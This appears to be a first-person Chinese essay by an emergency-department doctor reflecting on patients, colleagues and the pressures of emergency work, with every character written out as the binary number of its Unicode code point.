101010000001110 110000010010100 101111101010011 101001000011101 101110000110001 101111010010100 1000101111100101 111111011100111 111111011101101 101100100100111 101100011110000 111010110111110 101010001111100 1111111100001100 101111010010100 1000101111100101 101011100101000 110001001000000 110011100001001 111011010000100 100111010111010 1001010111101110 110001000010001 100111011101100 111011010000100 110010111110110 101000000011001 1111111100001100 111111011100111 111111011101101 1000101111110100 11000000000010 101111110001000 101100100011010 101111110001000 101100100011010 110101100100001 110001000010001 1001000011111101 101011100101000 110000011110011 1111111100001100 101100110000010 110011110011100 110010111110110 1001010111110100 1000000011111101 101100100011111 101000000010010 101011011011110 110011101100101 1000101111100101 101100100011010 101100101111101 11000000000010 1010 1010 110110100111011 111011101000000 101110000110001 110011000101111 101100101111101 111011010000100 1010 1010 101011100101000 110001 110011100001000 110010 110011 110010111100101 101110000000001 101011111001110 101001001001101 100111000000000 101100100101001 111011010000100 110011001011010 100111000001010 1111111100001100 110011100001001 111011011111000 101000101110011 1001000011101000 1001010111101000 111011010000100 110011100001011 101001111001011 110001001010011 111010100110101 1000101111011101 1001010111101110 110001000010001 110101101100110 110110001001001 101111000000010 110000000100101 1000101111001010 111010111000101 100111010111010 111011010000100 111011100011111 101101110011110 110000011000101 101000110110101 11000000000010 110001000010001 1000101111110100 100111101100000 100111011100011 1000100001101000 111100111000001 100111010111010 1111111100001100 1000111111011000 110011000101111 100111011100011 1000100001101000 101000101101100 101101110110110 11000000000010 100111011010110 1000101111110100 110001000010001 100111011100011 1000100001101000 111100111000001 100111010111010 11000000000010 110001000010001 1000101111110100 100111011100011 1000100001101000 100111000101010 100111010111010 101110000110001 101010001001010 1000101111001001 100111101100000 111011100011111 1000101111011101 1111111100001100 110001 110011100001000 110010 110001 101001111110111 1111111100001100 110001000010001 100111011101100 110000000100101 1000101111001010 111100111010001 110001110100101 1000101111001010 110001 110101 110010 110011 100111000101010 111010111000101 100111010111010 1111111100001100 110011000101111 101111110000000 101111000111000 110011100000000 101100100011010 110010111110110 111011010000100 110011 101000000001101 1111111100001100 101000101110110 100111000101101 101001111010001 111000011100111 111011010000100 110011100001001 110110 110101 110101 100111000101010 100111010111010 11000000000010 1010 1010 1001000010100011 110101110110101 110010111110110 1001010111110100 110000000100101 1000101111001010 111100111010001 111011010000100 111001010110110 101000110110101 1111111100001100 111111011001111 101001110000110 1000111111000111 111011010000100 100111010111010 100111000000000 1000111110001000 101101101010000 1001000011111101 101111111011000 100111000001101 100111010000110 1111111100001100 111010100011010 1000000111110011 100111100011010 1001100010100000 1000100110000110 100111101100000 111011010000100 110001001000000 110011100001001 100111010111010 111010100011111 1000100111000010 11000000000010 1010 1010 101100110000010 110011110011100 1000101111110100 1000111111011001 110011000101111 110001001010011 100111011010111 1111111100001100 110000000100101 1000101111001010 111100111010001 101110000110001 101011100101000 110011100000000 101001001001101 111111010111111 11000000000010 100111101000110 101111101010011 110010111110110 111011010000100 110000011000101 101000110110101 110011000101111 1111111100001100 101010000001110 1001011101100010 111011010000100 111010111000101 101001100111010 101110111110010 111111011001111 1001100101110001 101010010001100 100111010000110 1111111100001100 101011111111010 110011100101100 100111000001010 100111000000000 100111000101010 111010111000101 100111010111010 1001000011111101 100111000001101 110010100110110 1111111100001100 1001001 1000011 1010101 100111001011111 101011101011010 101000110110011 100111000001101 110010100110110 1111111100001100 1000101111110100 1001000111001100 1001011101100010 110011100001001 101111001110010 101000111000000 111011010000100 111010111000101 100111010111010 1111111100001100 100111000000000 1000111111011011 101001110111011 101110000110001 110110001100001 110011111010011 100111010000110 11000000000010 111010111000101 100111010111010 100111000001101 110010110101101 101011100110000 101111110000000 110000000100101 1000101111001010 111100111010001 110110110001100 1111111100001100 101010000001110 1001011101100010 111011010000100 1000110111101111 101001111001000 100111000001101 1001000000011010 1111111100001100 101110000110001 101000101101000 1001000011101000 101100000000110 101011100101000 110000000100101 1000101111001010 111100111010001 11000000000010 111010111000101 100111010111010 110011101100101 111011100001011 111010111000101 1111111100001100 100111000000000 110001110010010 1001011000011111 1001011010001111 100111110111111 101110000110001 110011000101111 101000111100000 100111000101010 101110000001111 110010111110110 1111111100001100 110001000010001 100111011101100 100111001011111 101101110001100 101000101101000 110110010100001 110110011010101 100111000001011 111001111101101 1111111100001100 101001111010001 111000011101101 1001010111101000 1000101111001010 101010010001100 110000000100101 1000101111001010 100111001011111 1001000011111101 100111000001101 101001000000110 100111010000110 1111111100001100 101100100100111 101001110000101 1001000111001100 101100000000110 110111011100001 100111010000110 111010111000101 100111010111010 1111111100001100 110001010100010 110010101010001 101101110100100 1000111110010011 110110110110010 101101110100100 1001000111001100 101001000110000 101100100000100 1001000011111101 110011000101111 111010111000101 100111010111010 11000000000010 1010 1010 1000111111011000 110011100001001 111011010000100 111010111000101 100111010111010 101101110110110 101110001011110 110011101100101 100111010000110 1111111100001100 1000101111110100 1000100110000001 100111000000000 101111100100000 101111010001010 1111111100001100 110001000010001 111011010000100 111001000111000 111001000111000 101011100101000 110110001111101 1000111101100110 1001000111001100 1001011101100010 100111000001101 1000100001001100 100111010000110 1111111100001100 101011011100000 100111000111010 1001000010100011 110010111110110 101000000011001 101011100110000 100111000001011 1000111101100110 101111010010011 101110111110010 101110000000001 1111111100001100 100111011010110 1000111101100110 101101101010000 100111001011111 101100000110101 111011101000000 101111100000000 100111000001101 1000111111011011 110011101100101 11000000000010 110001000010001 110110010100001 101001010011110 110110011010101 1111111100001100 101111000100110 111011101000000 100111010111010 101010010001100 1000101110111110 101100100000111 1000110111010001 101001110111011 110110001111101 1000111101100110 1001000111001100 101001110111011 1111111100001100 100111000000000 111011100001011 1111111100001100 100111010111010 101110111110010 111111011001111 110101101111011 100111010000110 1111111100001100 100111101100000 1000101111110100 110011000101111 100111011000000 100111001001000 110000100011111 101001111010111 1111111100001100 101111110001000 1001011010111110 101001111010111 101111110001000 1001011010111110 101001111010111 11000000000010 1000111111011001 100111000101010 100111010111010 101110000110001 110101101111011 101011100101000 110110001111101 1000111101100110 1001000111001100 1111111100001100 1000111111011110 100111000001011 1000111101100110 111011010000100 110011100111010 100111100011010 1001000011111101 110110010100001 110011100001001 11000000000010 1010 1010 1000111111011000 110011100001001 100111000000000 100111101001101 1000000000000001 100111010111010 1111111100001100 1000000000000001 100111100110100 101001000011010 101011100101000 1001000111010001 1001010011110110 110111101101101 101001100111011 1001011001100010 101001110111011 100111000010110 100111010000110 1111111100001100 101100101111001 111011010000100 101000100111111 101101101010000 11000000000001 101100101110011 101000100111111 1001000011111101 1000100010101011 110000100011111 110011111010011 100111010000110 1111111100001100 101011100101000 110001001010011 1001010010001000 1111111100001100 111000101100111 1001100001111110 101100101111001 111011010000100 110011000101111 101100101110011 101101001111111 1111111100001100 100111000000000 110011101100101 110001000010001 111011100001011 101100101111001 111010111000101 101111110010111 1001011101011110 101111000111000 1001000111001101 1111111100001100 1000000001010100 111110011111011 101010001111100 101010000111000 111100111010001 111111011011001 110010100110110 1000111111011011 101001110111011 100111101001111 1001011001100010 1111111100001100 101100101111001 101100101110011 101101001111111 100111000000000 111011100001011 101110000110001 110011000101111 100111000101010 110011100001001 110010110000111 101001100010110 110011100001001 111110100100000 1000110100101000 111011010000100 100111010111010 1111111100001100 1000111111000111 110011101100101 1000110111011111 110001000010001 1000101111110100 1000110000100010 1000110000100010 101001100111011 111010100011111 111101101001001 111101101001001 111011010000100 1111111100001100 110001000010001 101111111000011 1001000111001100 100111000000000 111110100100111 1111111100001100 1000101111110100 101111111101011 101001110111011 1111111100001100 110100000111001 110011100101100 1000000000111101 1000101111101111 100111000001101 100111010000110 100111010000110 11000000000010 111111011010011 110011110011100 1001000000000001 101001110111011 101110000110001 101001110111011 100111000010110 100111010000110 11000000000010 100111000000000 101001111100101 1000110000100010 1000110000100010 1000011001111101 111000100110110 101000111100000 111100111010010 1001010010011111 1111111100001100 100111101000110 100111001011111 1000000000111101 1000101111101111 100111010000110 101000111100000 111100111010010 11000000000010 1000111111011001 101001111100101 1000110000100010 1000110000100010 101001110001011 101111110010111 110001000010001 101111110001000 110110010001001 1001000111001101 11000000000010 1010 1010 1000111111011000 110011100001001 101111110001000 101100100011010 100111010111010 110001010001010 1000000111101010 101110111110001 111011010000100 101101110110110 100111010111010 1001000000000001 101001000110000 111011011010001 110001010100100 101101110100100 111011010000100 110010111110110 101000000011001 1111111100001100 101110000110001 110011000101111 100111011010110 100111011101100 1000100111000001 111011010000100 110011100000000 101010000001110 100111000000000 1001011101100010 1111111100001100 100111101100000 110110000111000 1000111111011100 1000100111000001 100111000001101 111011101000000 100111010000110 11000000000010 1010 1010 110001000010001 1000101110110000 101111110010111 101100100100111 101111001110100 100111000001001 101001101000001 111011010000100 110010111101001 100111000001010 110001000010001 110011101100101 100111010100100 111001111101101 1111111100001100 110001000010001 1000101111110100 110001000010001 100111011101100 110011101100101 111000101100111 100111000101010 111011011111000 1111111100001100 111111010101010 101111111110101 100111000000000 100111000001011 1000111111011001 100111000101010 101100100100111 101111001110100 100111000001001 101001101000001 1111111100001100 1000111111011000 101001111010001 100111010000110 100111000101010 110011100001011 101001111001011 101011100001000 11000000000010 1001000010100011 101100100101001 1111111100001100 101100100100111 101101110110110 1001000011111101 110110010100001 110011100001001 1000101111110100 100111011000000 100111001001000 111100101011101 111100110001111 1111111100001100 1000111111011001 111100111001101 110010111110110 101000000011001 1111111100001100 110110100111011 111011101000000 101110000110001 110011000101111 101100101111101 111011010000100 11000000000010 1010 1010 100111011100101 101001001001101 1111111100001100 100111101100000 101100110000010 110011110011100 110011100001001 100111000000000 111000010111001 101100100110001 1000101111101111 1111111100001100 110101111010100 101100110000010 110110010100001 110011100001001 101001111001010 110010111110110 110001001010011 1001010010001000 1111111100001100 111010111000101 100111010111010 1001000011111101 101001111101111 1000000011111101 1000111111011000 101001110111011 1001010111111001 1111111100001100 111001110110000 101011100101000 110110010100001 100111010111010 100111010000110 1111111100001100 110110010100001 110011100001001 100111010111010 1000110111011111 100111101100000 101010000110101 1111111100001100 110110010100001 110011100001001 100111010111010 1000110111011111 100111101100000 1001010111111001 100111010000110 1111111100001100 110001001000000 110011100001001 100111010111010 1001000011111101 1000100010101011 1000111111011001 111100111001101 111101010000001 111000100110110 110011101100101 111011010000100 110001001010011 101000111111011 101000111111011 101011110101110 100111010000110 1111111100001100 110010000011110 1000010010011001 100111010000110 11000000000010 1010 1010 111010111000101 100111010111010 110101101111011 100111010000110 1111111100001100 101111110001000 101110000010001 111011100001011 101001000110000 101101110110110 101110001011110 110011100001001 101111110001000 100111100100100 101111111000011 101011100110000 101010011101101 111011010000100 1111111100001100 101011011100000 100111000111010 101100100101010 101100100011010 100111010000110 1111111100001100 101100100101010 101100100011010 100111010000110 11000000000010 110011100001001 100111010011011 101101110110110 101110001011110 100111001011111 100111000001101 100111100011010 1000101111110100 101001100111011 111010100011111 110110001000010 110110001000010 100111101100000 110010101010001 110010101010001 110001000010001 111011010000100 101101110110110 100111010111010 1111111100001100 1000000000001100 110011000101111 1000110111011111 101001100111011 111010100011111 1000101111110100 1111111100001100 101010100001001 1111111100001100 1001000010100011 101110000110001 101111111101011 111000010111001 1000100111100011 1000000100110001 101010000100111 1111111100001100 101110111110010 111111011001111 101001000110000 100111010000110 1000111111011001 100111000101010 101011100110000 110101101100101 11000000000010 101011011100000 100111000111010 1000111111011001 110010111110110 101000000011001 110101111001111 100111000101010 100111010111010 110000000010101 111011010000100 1001000011111101 110011000101111 1000000111101010 101110111110001 1000100010101011 110000100011111 110011111010011 11000000000010 1010 1010 100111000000000 101100100101001 101001111010001 111000011101101 1001010111101000 1000101111001010 1001010111101000 101001111100011 111011010000100 110001110010010 1001011000011111 1111111100001100 1000100110000001 110001110010010 110101 100111000101010 101110000001111 110010111110110 11000000000010 110101101100011 110001110010010 111011101000000 100111000000000 100111000101010 101100101110011 111011010000100 101000000010010 100111000001011 100111010000110 1111111100001100 111011100001011 101100101111001 111101001111111 111011101000000 111011010101110 1000100001100011 1111111100001100 1000000011001100 111011101000000 101001100000101 101001100000101 1111111100001100 111101001111111 111011101000000 1001101011011000 1000110111011111 1001011110001011 1111111100001100 101111010010100 1000101111100101 110011000101111 101111110001000 1000101110110010 111101001110110 111011010000100 100111000000000 100111000101010 100111000101101 101111001110100 101100101110011 110000000100111 1111111100001100 101001111101111 110011000101111 110110010100001 110011100001001 100111010111010 110010101100010 100111000001010 101001001001101 101001110111011 110001001110110 101100101111001 1111111100001100 101110000110001 101011100101000 101011100110000 100111000001010 1000111010111010 100111010000110 101111110001000 100111001000101 11000000000010 101001111101010 101111110010111 110001000010001 101001110111011 101010110001010 110001010100100 101100011101011 11000000000001 101001100111011 111010100011111 110011101100101 101001110111011 110001001110110 101100101111001 11000000000010 1010 1010 110001 110011100001000 110011 110000 101001111110111 110001000010001 110010111101001 100111000001010 110011101100101 100111000001010 111001111101101 1111111100001100 100111000000000 100111000101010 111011001111101 101001111010001 1000000000000001 100111010111010 111011010000100 101000100111111 101101101010000 110011 110010 101110010000001 110101101111011 100111010000110 1111111100001100 100111011010110 101110000110001 111011011101111 111011101000000 111011100001011 101001100111011 111010100011111 111111011011001 100111011010110 101111100000000 110101101111011 100111010100001 1000101111000001 110011000001110 11000000000010 110100000111001 110011100101100 110110010100001 110011100001001 111011100111100 110110011101010 1111111100001100 110000000001110 100111001001000 101010011101101 1111111100011111 110110010100001 101001010011110 110110011010101 101010011101101 11000000000010 111011100001011 100111011010110 111011010000100 110001001010011 110001001101110 1111111100001100 101001111101111 1000000011111101 101110000110001 110011000101111 100111000000000 100111000101010 101100100010110 110011101100101 111011010000100 110001001010011 101110111100101 111011010000100 1111111100001100 110110010100001 110011100001001 100111011111011 100111101010101 110111000100000 1001000001010011 101001110111011 101001111001101 110011000100000 11000000000010 110110010100001 110011100001001 111100001101110 1000101111001010 1111111100001100 100111011010110 111011010000100 101000100111111 101101101010000 1111111100001100 101110000110001 101001111011000 110001000010000 100111010000110 100111000000000 101111100100000 110101101111011 100111010100001 1000101111000001 110011000001110 11000000000010 1010 1010 1000111111011001 100111001011111 110011000101111 110001000010001 110000011110011 1000100110000001 101001110111011 101010001111100 101010000000001 100111000000000 100111000001011 111011010000100 11000000000010 101011100101000 110000000100101 1000101111001010 111100111010001 110101101111011 100111010100001 111011010000100 111010111000101 100111010111010 1001000011111101 110011000101111 110110010100001 110011100001001 1000101111001010 110010110101101 11000000000001 110110010100001 101001010011110 110110011010101 111100001101110 1000101111001010 111011010000100 111010111000101 100111110001011 1111111100001100 111101101001001 1000111111011001 100111000101010 111010110101011 110000011000101 1000111111000111 101001110111011 100111001001011 101010000001110 1111111100001100 110001000010001 101111000001100 110011100011011 1000000011111101 111111011011001 100111011010110 100111011101100 100111000000000 100111000101010 100111010100100 100111011100011 1111111100001100 111111011011001 100111011010110 100111011101100 111011010000100 101101110110110 101111010101101 100111000000000 100111010011011 101101110001001 110001010011010 1111111100001100 110001000010001 100111011101100 111011010000100 111010111000101 100111010111010 101111110001000 101001111101111 110000000011100 111011010000100 1111111100001100 101111110001000 101001111101111 110000000011100 11000000000010 1010 1010 11000000001100 101111001111000 1000111111010000 11000000001101 1010 1010 101000001011010 100111010000110 1000111111011001 100111001001000 101100100011010 101111001110100 101001100111011 111010100011111 1111111100001100 110001000010001 100111000000000 111011011110100 1000100111001001 101111110010111 110110010100001 110011100001001 100111011000000 100111001001000 101011011110000 1001011010111110 1000000011111101 101100100011111 110001001010011 101000000010010 110001000010001 1111111100001100 1000111111011001 100111001011111 101010010001100 110001000010001 111011010000100 111111011001111 101001110000110 11000000000001 100111000101010 110000000100111 110011100001001 101000101110011 11000000000010 1010 1010 111001 101110010000001 1001000010100011 101111001110100 110001000010001 111001000111000 111001000111000 101110000110001 1000000011000011 111011001001100 101001110111011 100111000010110 100111010000110 1111111100001100 1001000010100011 100111000101010 110010111110110 101000000011001 110001000010001 101110000110001 110000011110011 111011101000000 1001010101111111 101100100100111 100111010000110 101111101010011 100111000101010 101001100111011 111010100011111 101001110111011 110010101010001 101001000101011 100111010111010 111011010000100 101010001111101 11000000000010 101010000001110 110011101100101 1001101011011000 1000000000000011 111011010000100 110010111110110 101000000011001 1111111100001100 110001000010001 111011010000100 101111111010111 110000100111111 101100001101011 111011010000100 101000101101000 1001000011101000 1001000011111101 110011000101111 101001100111011 101101101100110 100111000010011 100111000011010 1111111100001100 110011100000000 101010000001110 1000000000000011 101001111010110 100111010000110 101010000001100 110110101001110 101001100111011 101101101100110 1001011001100010 11000000000010 110001 111001 111001 110111 101111001110100 110001000010001 101100100100111 101101101100110 110101111010101 100111000011010 1111111100001100 101110000110001 101001000110000 100111010000110 100111000101101 101111111000011 101001100111011 1001011001100010 1111111100001100 100111001001011 101001001001101 101011100101000 101111111000011 1000100001000000 111101110100001 101000110000101 111100111010001 101110111100101 100111101011100 1111111100001100 110010 110000 110001 110000 101111001110100 101001000110000 110000000100101 1000101111001010 111100111010001 101111101010011 100111000111011 100111011111011 111011010000100 11000000000010 1010 1010 110001000010001 1000100111001001 101111110010111 110000000100101 1000101111001010 111100111010001 101110000110001 101000011001111 110001000010001 111011010000100 100111000000000 100111000101010 101101101101001 101101101010000 100111000000000 110100000110111 1111111100001100 110001000010001 110001010001010 101101110000011 110010000011110 110001000010000 1000111111011001 100111001001000 101100100100111 1111111100001100 110010000011110 101111110010111 101100100100111 101101110110110 101011011100010 111111011010011 1000110101110111 110011101100101 1111111100001100 101000001011010 110001000010000 1000111111011001 100111000101010 101110001000000 1001011101100010 100111000001101 101101110111001 110011000010011 1111111100001100 110001001000000 100111011100101 101111110001000 111001111001101 110000011011100 1111111100001100 1001011101011110 101111000111000 111001111001101 110000011011100 1000111111011001 100111000101010 1001011011000110 100111101010011 11000000000010 1010 1010 101001001001101 101000111100000 101100100101001 1111111100001100 110001000010001 111011010000100 100111000000000 100111000101010 110001010100100 101100011101011 101001111010001 110011100001011 101001111001011 101011100001000 1000101111110100 1111111100001100 101100101111101 110000000000000 101111111110101 100111011100101 101001001001101 101111111011001 111100010001100 111011010000100 101100100100111 110000000100101 1000101111001010 1111111100001100 1001000010100011 111100111001101 101111111011001 1000110111011111 1000111111011001 111100111001101 101111111011001 101101110001100 101000101101000 110011000101111 100111000100100 100111000101010 110100110000010 101111111110101 11000000000010 1010 1010 101011100101000 1000111111011001 110101100100001 111010110101011 110000011000101 100111001001011 101001001001101 1111111100001100 101111111000011 110100010010111 11000000000001 1000000100010001 110100010010111 11000000000001 110110110001000 101001100010110 1001000001010011 101000111111010 1000100001000000 11000000000001 101100100010110 100111100100100 111101101001001 111101101001001 1000111111011001 100111010011011 110001001001101 110011000101111 110001000010001 100111011101100 110000000100101 1000101111001010 111011010000100 1000001100000011 111010101110100 11000000000010 1001000010100011 111100111001101 101111111011001 110011000101111 110011100001001 110001000010000 101110000110001 110000100011111 111011010000100 101111111011001 1111111100001100 111011011101110 111011010000100 110011000001110 111100001101110 1111111100001100 1001010010001000 101101111111001 101010000000100 111100111001101 111110001111011 101011110001011 111011010000100 111010111000101 100111010111010 1001000011111101 110011100001001 101111110001000 1001000000011010 111010101000101 111011010000100 110110101000001 111101000001011 1111111100001100 101111110001000 110001000010000 111000110011111 1111111100001100 100111000001011 100111000000000 110101101100101 101111001110010 100111011000000 100111001001000 1111111100001100 110000000001110 100111001001000 101000001011010 1111111100001100 101000111111010 100111010000110 1001010111101110 1001100010011000 110001001111110 101010011101010 100111000000000 100111000101010 11000000000010 1000000000001100 1000111111011001 100111000000000 110101100100001 110011000101111 1000111111011001 100111001001000 101100100011010 101001101110001 1001000111001101 111010111000101 100111010111010 110110010100001 101001010011110 110110011010101 101001110111011 101100100000100 111010000000110 1111111100001100 110110010100001 101001010011110 110110011010101 110010100110110 100111101001111 1001011001100010 1111111100001100 1000000000001100 100111000010100 110001000010001 100111011101100 101001100111011 101001010100001 100111010111010 101010001011000 1000111111011000 101011100101000 1000111111011001 111100111001101 1001100011001110 1001011001101001 100111001001011 100111000101101 1111111100001100 1000111111011001 111100111001101 101111111011001 111011100011111 111011010000100 101111110001000 110010111100000 101100101001000 1111111100001100 101111110001000 111010111011011 101111111000011 11000000000010 1010 1010 110011100001001 100111000000000 101100100101001 110010111101001 100111000001010 111000 111000010111001 1111111100001100 110001000010001 100111011101100 111100111010001 100111000000000 100111000101010 101111001110100 1000111101111011 101001100111011 111010100011111 1000110111011111 110001000010001 101001111010001 101111110101110 100111111100001 1111111100001100 100111001011111 110011000101111 1000011011101110 110011100001001 110000000100111 110100000111100 111011010000100 1111111100001100 1000101111110100 110001000010001 100111011001010 101100100101001 100111000001101 110011101100101 100111000001010 111001111101101 100111010000110 1111111100001100 100111000001101 1000001000010010 110011100001101 11000000000010 101011011100000 100111000111010 110001000010001 100111011101100 1000111111011001 1001000111001100 1001000011111101 110011100001001 1000100111000100 111011111101001 111011010000100 1111111100001100 100111101100000 100111000001101 1000001000010010 110011100001101 1000100110000001 110001111010000 101001001001101 1000110111011111 110001000010001 1000101111110100 101100101111101 101101110001001 110001110010010 1111111100001100 100111101100000 101001000110000 111000 111000010111001 1001010010011111 1000110111011111 110001000010001 1000101111110100 1111111100001100 110001000010001 101001000110000 101010011101010 1001000111001100 101001110111011 110001001111110 100111010111010 11000000000010 100111011010110 101011100101000 101111110101110 100111111100001 100111000101101 101101111111001 110001000010001 101001111010001 1000000100111110 110110000010100 1111111100001100 1000101111110100 101100100100111 1001000111001111 111011010000100 1001101011011000 101111010100110 111010110010001 100111100111100 111010111000101 100111110001011 1000100010101011 100111101100000 1001100010000110 101101111111100 111011010000100 110000000100101 1000101111001010 111100111010001 110010100111110 101011011011110 111100100111110 100111100011010 1111111100001100 110001000010001 100111011101100 1000111111011001 110011000101111 100111101011100 101101101111101 1111111100000001 110001000010001 111010000000110 1000100111100011 100111011010110 110011000101111 101011011100000 100111000111010 100111101011100 100111000111010 101001100111011 111010100011111 111011010000100 1000001001101111 111011111100101 1111111100001100 100111101000110 110001000010001 100111001011111 110000000100101 100111010000110 1111111100001100 110001000010001 1000101111110100 100111101100000 101001111101111 100111011100101 101001110111011 101010001001010 110001000010001 1111111100001100 101100110000010 110011110011100 100111101100000 110011000101111 110000000100101 1000101111001010 111100111010001 100111000111011 100111011111011 1111111100001100 100111101100000 1000101111100101 110000000001110 100111001001000 101001010011110 1111111100011111 1010 1010 101010000001110 110011101100101 1111111100001100 1000111111011001 100111000101010 101001100111011 111010100011111 100111100010001 110000001101111 100111010000110 101000111100000 101100100101001 101010000001110 1111111100001100 1000111111011000 110011000101111 111000101100111 110100000110111 110011101100101 101110111100101 100111101011100 11000000000010 100111011010110 100111000001101 110011000101111 1000101111110100 110000000010101 110101101111011 110000000010101 111110100101111 1111111100001100 1000000000001100 110011000101111 1001000001000111 101001000110000 1000111111011001 111100111001101 110000011000101 101000110110101 1111111100001100 100111000000000 100111000001011 101101101010000 1001011101100010 101101111111001 1000111111011001 100111001001000 101100100011010 111010111000101 100111010111010 110000100011111 101001000110000 101111110001000 101110100101001 110111010000011 11000000000010 1010 1010 100111101011100 100111000111010 101001100111011 111010100011111 110011101100101 1000101111110100 1111111100001100 111001001111001 101001000101011 110011000101111 101010000001110 1001011101100010 101111110001000 101100100011010 110011101100101 110010100101111 110001111110100 111011010000100 101001100111011 111010100011111 1111111100001100 110100000111001 110011100101100 101111111000011 111010000000110 100111000001010 101001111010111 100111000001101 100111010000110 1111111100001100 111100010110000 101001000110000 1000111111011001 111100111001101 110000011000101 101000110110101 110000111110101 100111010000110 1111111100001100 110011100001001 111011010000100 101001100111011 111010100011111 11000000000001 110001010100100 101100011101011 101110000110001 101010011101101 11000000000010 100111000000000 100111000101010 110011000101111 101010011101101 101001000101011 100111010111010 1111111100001100 101000110001101 100111000000000 100111000101010 100111001011111 110011000101111 101010011101101 1000000111101010 101110111110001 1111111100001100 101011011100000 100111000111010 110101111001111 100111000101010 100111010111010 1001000011111101 100111000001101 111011111100101 1001000001010011 100111011000000 100111001001000 110010111110110 101000000011001 101110000110001 1000111101101110 101001000110000 1000000111101010 101110111110001 110000100011111 110011111010011 11000000000010 1010 1010 101100100100111 110100110000010 101011100101000 110001 110011100001000 100111000101101 100111000001011 110010111101100 1111111100001100 101001100111011 1001011001100010 111011010000100 1001100010000110 101101111111100 100111001011111 1001011001000110 1001011001000110 111111011101101 111111011101101 101011100110000 1001000011111101 111010111000101 101000000010010 100111010000110 1111111100001100 101001100000101 110001011101100 110001000010001 100111011101100 111011010000100 1001010111101000 101001010011110 100111000111011 100111011111011 1111111100001100 100111000001001 100111101001101 101001001101111 1001011001100010 1001010101111111 11000000000010 101001100111011 101001010100001 111100111010001 111100111010001 1001010101111111 111011010000100 101100101110011 101000100111111 100111001011111 111010111000101 100111010000110 1111111100001100 100111011010110 100111001011111 101011100101000 101101110110110 1001000111001100 100111100010001 110000001101111 11000000000010 110001001000000 100111011100101 101011111111010 110011100101100 100111000001010 1001000010100011 100111000000000 110101110110101 110010111110110 1001010111110100 110011000101111 110110010100001 110011100001001 100111010111010 111101110100001 100111101100000 1111111100001100 100111101100000 101110000110001 101011100101000 1001000010100011 101000100111111 110001000011000 110010110010111 101010000100111 1111111100001100 101110000110001 110011000101111 1001000010100011 111100111001101 110000100011111 1000100111001001 11000000000010 1010 1010 110001000010001 1000111010101011 1000111110111001 111011010000100 100111010111010 100111001011111 101111100000000 101100111001011 100111000000000 100111000101010 110001110100101 100111000000000 100111000101010 101011100110000 101000000010010 110001110001001 11000000000010 110001 110011100001000 110001 111000 110010111100101 1111111100001100 110010111101001 100111000001010 111000 111000010111001 101001101001010 1111111100001100 110001000010001 100111011101100 101000000010010 111011010000100 111101100101100 100111000000000 100111000101010 101001100111011 111010100011111 1111111100001100 100111011010110 1000101111110100 100111000111011 100111011111011 110001000010001 100111000101101 110001011011011 100111010000110 1111111100001100 100111000001101 111000011100111 1111111100001100 101001111101010 101000001011010 100111010000110 1000011 1010100 1111111100001100 1000000010111010 1001000011101000 100111000000000 101100100100111 101011101101000 111100011101000 111001110111011 111010010000011 11000000000010 100111000001101 100111000000000 100111100011010 101000100111111 1111111100001100 1001011010010100 111100110111011 111010111000101 110001000111111 1000110100011111 1000110100100011 111011010000100 100111000000000 100111000101010 1000110100100011 100111011111011 110001010100100 101100011101011 1111111100001100 101010001001010 1000101111001001 110001000010001 1000101111110100 100111011010110 100111001011111 101000000010010 100111010000110 11000000000010 110011001011010 100111000001010 1111111100001100 110001000010001 100111011101100 111011010000100 110001010100100 101100011101011 1001010101111111 100111001011111 101000000010010 100111010000110 11000000000010 110001000010001 101111101010011 110010111110110 1001011101011110 101111000111000 111011100011111 101101110011110 111011010000100 111101100101100 100111000000000 110000100011111 1000100111001001 110011000101111 10000000010100 10000000010100 101111001111000 1000111111010000 1111111100001100 101011011100000 100111000111010 101000000010010 101111110010111 110010111101001 1111111100001100 101001111101111 100111011100101 110010111101001 111000010111001 100111000001011 110001000011000 101011100111010 11000000000010 1010 1010 1000111111011001 100111000001001 100111000101010 100111010111010 110001000010001 1001000011111101 101101111000110 101001000000111 110001110100101 1000100111100110 1000111111000111 1111111100001100 110001000010001 101110000110001 110011000101111 110001010110001 111011101000000 101111111000101 101000000010010 111011010000100 100111111100001 101111111110101 110101111001111 101100100101001 101011100101000 101110111100101 100111101011100 1111111100001100 111111011010011 110011110011100 100111000000000 111011011110100 110110010100001 101000000010010 11000000000010 101000101101000 1001011001100010 111011010000100 100111010111010 1001000011111101 1000100111001001 101111110010111 110001000010001 110011000101111 100111000101010 101100101000111 1000111111111001 11000000000010 110001000010001 1000000111101010 101110111110001 101001000000110 110011110010000 100111010000110 100111000000000 100111000001011 1111111100001100 101001111101111 1000000011111101 110011000101111 101011011100000 100111000111010 110001000010001 110011100101100 1000111010101011 110011100001001 101010011101110 101010110011000 1111111100001100 101011100101000 111010100101000 100111000000000 100111010011011 101010000111000 101000101100101 110000000100111 111011010000100 110111111000000 111110100100000 1111111100001100 101001111101111 1000000011111101 100111100011010 110001010010001 101001000110110 1000111111011001 100111010011011 111010111000101 110101111010010 101011100101000 1000000010111010 101000110000101 110110010001001 111100111101111 11000000000010 1010 1010 110001000010001 110000000111011 1000100111001001 101111110010111 110001000010001 100111011101100 101000001011010 110000000100101 1000101111001010 111011010000100 100111010111010 1001000011111101 111101110010111 110011000101111 110011100001001 110000011000101 110000000000000 111011010000100 100111010111010 10000000010100 10000000010100 101011100101000 100111000101101 101011011111101 111011010000100 101001100111011 1001011001100010 1111111100001100 110000000100101 1000101111001010 111100111010001 111011010000100 101011100110000 100111101001101 101011100101000 110001001000000 110011100001001 111100111010001 101101110100100 101111101010011 100111000101101 101111010010100 1000101111100101 110011000101111 110101111010100 1000111110000011 100111101001110 111011010000100 1111111100001100 101011011100000 100111000111010 101100100100111 101101110110110 1000100111001001 101111110010111 110000000100101 1000101111001010 1111111100001100 110010111100000 1001011101011110 101110000110001 110011000101111 100111000101010 1001000000011010 1001000001010011 1111111100001100 110001010001010 111010111000101 100111010111010 110010100110110 1000111111011011 101001110111011 101110000110001 1000100001001100 100111010000110 11000000000010 1000111111011001 110101100100001 110001010010111 111010110101011 100111000101101 1111111100001100 1000111111011001 111100111001101 101111111111101 1000100111000110 100111001011111 100111000000000 111011011110100 1001000011111101 101101101011000 101011100101000 11000000000010 1010 1010 110010111101001 110011100011111 111011010000100 110010111110110 101000000011001 1111111100001100 111001001101001 1000110101000100 100111000001101 101100100011111 1111111100001100 110011100001001 110010111110110 101000000011001 101001000000110 111111011011001 110000000100101 1000101111001010 111100111010001 111011010000100 1001011000110010 110001010100100 110011100001101 1000110100101000 1001000111001111 1001011101011110 101111000111000 101110111101110 1111111100001100 111011100001011 101001000110000 110001000010001 100111011101100 111011010000100 110001010100100 101100011101011 111101011011111 111000100110110 111101001111111 111011101000000 